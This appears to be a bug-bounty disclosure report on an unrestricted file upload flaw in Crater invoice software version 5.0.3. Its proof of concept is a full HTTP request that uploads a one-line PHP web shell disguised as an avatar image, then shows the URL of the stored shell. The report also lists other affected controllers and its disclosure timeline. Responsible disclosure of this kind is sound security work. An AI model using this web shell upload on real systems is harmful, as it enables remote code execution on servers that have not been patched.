Unrestricted Upload of File with Dangerous Type in crater-invoice/crater
Valid
Reported on
Dec 3rd 2021
Description
In recent Crater version (ed6268aa tag: 5.0.3) lowest privileged user can upload PHP file instead of avatar.
Proof of Concept
POST /api/v1/me/upload-avatar HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
company: 1
X-XSRF-TOKEN: eyJpdiI6IlBrOE1JS01vcDBqL0hqcXZURTRQMmc9PSIsInZhbHVlIjoiMVVSUVk5N3FmYTh2UG5KSiszSmp3aEg5MXlxSWFMUHRNZFpyME5LRFM3OEpiRWR3dlVCeDJ4a2FYQU9hYmFrZjBmNVBUbGp5UitIY1c3L1JtcWtGaDdoalBXSXU3L2NFS2NMbHZVT3JhNm1zeXdLZllkR2RNVGdKL3NuSWhWblciLCJtYWMiOiI0OTRhMmZkZGFjODA1MWY3ZWQyZmRhY2RhNmRkOTVlNDc0Njg2YzlmY2E2NzkyZjU0ZWExNjBiZjVhZGViMGE2IiwidGFnIjoiIn0=
Content-Type: multipart/form-data; boundary=---------------------------324661512726686552372889486730
Content-Length: 270
Origin: http://172.17.0.1:8888
DNT: 1
Connection: close
Referer: http://172.17.0.1:8888/admin/settings/account-settings
Cookie: XSRF-TOKEN=eyJpdiI6IlBrOE1JS01vcDBqL0hqcXZURTRQMmc9PSIsInZhbHVlIjoiMVVSUVk5N3FmYTh2UG5KSiszSmp3aEg5MXlxSWFMUHRNZFpyME5LRFM3OEpiRWR3dlVCeDJ4a2FYQU9hYmFrZjBmNVBUbGp5UitIY1c3L1JtcWtGaDdoalBXSXU3L2NFS2NMbHZVT3JhNm1zeXdLZllkR2RNVGdKL3NuSWhWblciLCJtYWMiOiI0OTRhMmZkZGFjODA1MWY3ZWQyZmRhY2RhNmRkOTVlNDc0Njg2YzlmY2E2NzkyZjU0ZWExNjBiZjVhZGViMGE2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im13VlVJa1JyZWs4OWFLWlBBa0JobXc9PSIsInZhbHVlIjoiU21kVnR2Skc1UnZmSnR3SVhiL09qSFBmWGxGV0FMUi9pSzFSTkc2enBZL01GbkJBbCtiMzJmWnNLM3l2OWRJRVk0bUZ2dFRYTkVTWnRQV0xCNnkxbFdIOEJjS1E5N2dwRWNyNC90cHZRSTJaWHozcWNtcmo2RTltY2U0Q1ZEeXQiLCJtYWMiOiJmMzIxYTFiNjU2Y2QyOWM2ZDdiOWJiYzMyYjQ3NWFmZGM3NDU0ZTA0MjNhZjg0ZGEzZDgzZGFlMGEwMjQzMGJmIiwidGFnIjoiIn0%3D; D5zxaxhEVxptcHSFSkkLadY5LtUnr9yDLzGS8IGz=eyJpdiI6Im9jcVpRWkgzTTM2dzZjb3ZsQnlvTnc9PSIsInZhbHVlIjoiWXhGWk9CNlNpQUw2YVNuSWhtekF0TDUwbExybG1jM0tramgzWUlkbVJYa3hCcU1DbnFFbjhwWG5mNGpEU2RsSCtubHBQcXNadDhESDVFU0hZOVRtTFVudmFVRzRtemdMMWpKWm5LZ0JmckJQYnpndE9YQ3p1ZUF4SlRuaWJPWlJCK2hQMjM1QUlEaWo2b28raFh3VTRaN3J4aDdiS3AxSTNtUkJtOE5kT2VqY0d6ejUzZHc2THZhNVNSYVRpcmJ0YWM1L3crdDJSWUU2NlNDb0hUS0xYVWI0anJIOGJWOVIrcFpzWW8yZlF5RnhLZVJ2cFcvUHF6VUZQVkd6MXFtdm9ncWlFTE1QaVBHM1gvR1piVUZnZ0ovR2hFMWhJTUI0cDl5VVdCYUlQNVNKa1VlVGVoVW05dkg1R3pyUUNkRDFtTnBCaCt3UnBqNWpYVGFPN05JeHVGamF5SVJmYVdMdVY1QmRNeHo2R25BWDQ0ay9KRXhxTlZxWnJnYW5hZUdsdk1XeXQ2Mm9wdzJxSmNhbU9OMnNiUVBPaitYQ3F3VzE1amQ5Zm5xbGxuVE1ReUxiaDd4RVNuTkNuUVpyQmpWMldUb1lKNHdXWWJkR3plUjVOcWZKOW91WHhxNG1hMmJqVElMbTR3blJhdFpJalFUTS9mM3UraGZjdDRRL1Ura2c4Wmx2d1piaFRYMmN0Uk1mTFkvVEZRPT0iLCJtYWMiOiJmOGY0NTVmYmUxYTQ4NDI0YzJkN2UxOGM0NzEyZWMwODUwODE4YjllZjM1ZDE4OGMzNDg5NjI1ZDhjYzIwOThiIiwidGFnIjoiIn0%3D
-----------------------------324661512726686552372889486730
Content-Disposition: form-data; name="admin_avatar"; filename="shell.php"
Content-Type: image/svg+xml
<?php print_r(shell_exec($_GET[1])); ?>
-----------------------------324661512726686552372889486730--
In response You can find link to uploaded file in data->avatar
{
"data":
{
"id": 3,
"name": "user2",
"email": "user2-crater@zaqwsx.cc",
...
"avatar": "http:\/\/172.17.0.1:8888\/storage\/4\/shell.php",
"is_owner": false,
...
}
}
Impact
This vulnerability is high and leads to code execution
Occurrences
UploadReceiptController.php L18
Not validated file can be uploaded also here
CompanyController.php L64
Not validated file can be uploaded also here
We are processing your report and will contact the
crater-invoice/crater
team within 24 hours.
2 years ago
theworstcomrade modified the report
2 years ago
theworstcomrade modified the report
2 years ago
We created a
GitHub Issue
asking the maintainers to create a
SECURITY.md
2 years ago
We have contacted a member of the
crater-invoice/crater
team and are waiting to hear back
2 years ago
2 years ago
UploadReceiptController.php#L18
has been validated
CompanyController.php#L95
has been validated
CompanyController.php#L64
has been validated
to join this conversation